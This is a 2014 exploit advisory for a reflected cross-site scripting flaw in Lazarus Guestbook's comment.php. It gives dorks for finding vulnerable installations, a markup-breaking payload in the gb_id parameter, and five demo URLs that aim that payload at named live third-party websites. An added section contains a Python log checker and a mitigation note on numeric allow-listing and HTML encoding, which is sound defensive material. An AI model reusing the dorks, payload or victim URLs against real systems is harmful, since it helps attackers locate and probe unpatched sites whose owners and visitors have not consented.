
Lazarus Guestbook Cross Site Scripting (XSS)

Author: wlhaan hacker, Published: 04-11-2014
_____________________________________________________
( Lazarus Guestbook Cross Site Scripting XSS )

#####################################################
# [+] Author : wlhaan hacker #
# [+] Email : iit@HoTMaiL.coM #
# [+] Site : http://carbonize.co.uk
# [+] Download : http://carbonize.co.uk/Lazarus/files/gbdownload.php
# [+] team wlhaan Hacker #
# [+] Dork : Powered by Lazarus Guestbook from carbonize.co.uk

dork 2

inurl:"admin.php?included=1"

#####################################################

The exploit :
comment.php?gb_id=29.htaccess.aspx-->">'>'"<vvv000005v738566>

http://localhost/PATH/comment.php?gb_id=29.htaccess.aspx-->">'>'"<vvv000005v738566>
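
Added example (not part of the original advisory and not Lazarus code): a log check that flags comment.php requests whose gb_id is not a plain number, plus the HTML encoding that neutralises the markup-breaking characters in the string above. It assumes gb_id is a numeric entry id; the log lines, hosts and paths are constructed.

```python
import re
from html import escape
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; addresses and paths are made up.
SAMPLE_LOG = [
    '198.51.100.7 - - [04/Nov/2014:10:01:02 +0000] "GET /gb/comment.php?gb_id=29 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [04/Nov/2014:10:01:05 +0000] "GET /gb/comment.php?gb_id=29.htaccess.aspx--%3E%22%3E%27%3E%27%22%3Cvvv000005v738566%3E HTTP/1.1" 200 5164',
    '198.51.100.7 - - [04/Nov/2014:10:01:09 +0000] "GET /gb/index.php?entry=0 HTTP/1.1" 200 9001',
    '198.51.100.9 - - [04/Nov/2014:10:01:11 +0000] "GET /gb/comment.php?gb_id=%2029 HTTP/1.1" 200 5120',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
VALID_ID_RE = re.compile(r'[0-9]{1,10}')  # assumption: gb_id is a numeric entry id


def suspicious_gb_ids(lines):
    """Return (line_no, decoded gb_id) for comment.php requests whose gb_id is not numeric."""
    hits = []
    for line_no, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith('/comment.php'):
            continue
        # parse_qs percent-decodes values; keep_blank_values so "gb_id=" is also checked
        for value in parse_qs(url.query, keep_blank_values=True).get('gb_id', []):
            if not VALID_ID_RE.fullmatch(value):
                hits.append((line_no, value))
    return hits


def render_safe(value):
    """HTML-encode a value before it is written into markup (quotes included)."""
    return escape(value, quote=True)


if __name__ == '__main__':
    for line_no, value in suspicious_gb_ids(SAMPLE_LOG):
        print(f'line {line_no}: gb_id={value!r} -> encoded: {render_safe(value)}')
```

The same allow-list (digits only) applied server-side before gb_id is used, with encoding on output, is the mitigation for this class of reflected input.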

#####################################################

DEMO
http://www.chastaincentral.com/lazarusgb/comment.php?gb_id=29.htaccess.aspx--%3E%22%3E%27%3E%27%22%3Cvvv000005v738566%3E

http://www.natural-light.org/lazarusgb/comment.php?gb_id=29.htaccess.aspx--%3E%22%3E%27%3E%27%22%3Cvvv000005v738566%3E

http://www.milkandhoneyfarm.com/lazarusgb/comment.php?gb_id=29.htaccess.aspx--%3E%22%3E%27%3E%27%22%3Cvvv000005v738566%3E

http://www.fowlplayguideservice.com/lazarusgb2/comment.php?gb_id=29.htaccess.aspx--%3E%22%3E%27%3E%27%22%3Cvvv000005v738566%3E

http://107exito.com.gt/gb/comment.php?gb_id=29.htaccess.aspx--%3E%22%3E%27%3E%27%22%3Cvvv000005v738566%3E


#####################################################

and good luck :D

Thanks to : shooq hacker ..


Discovered By : wlhaan hacker


https://twitter.com/waleedal3ybani

https://www.facebook.com/waleed.alaibani

#####################################################
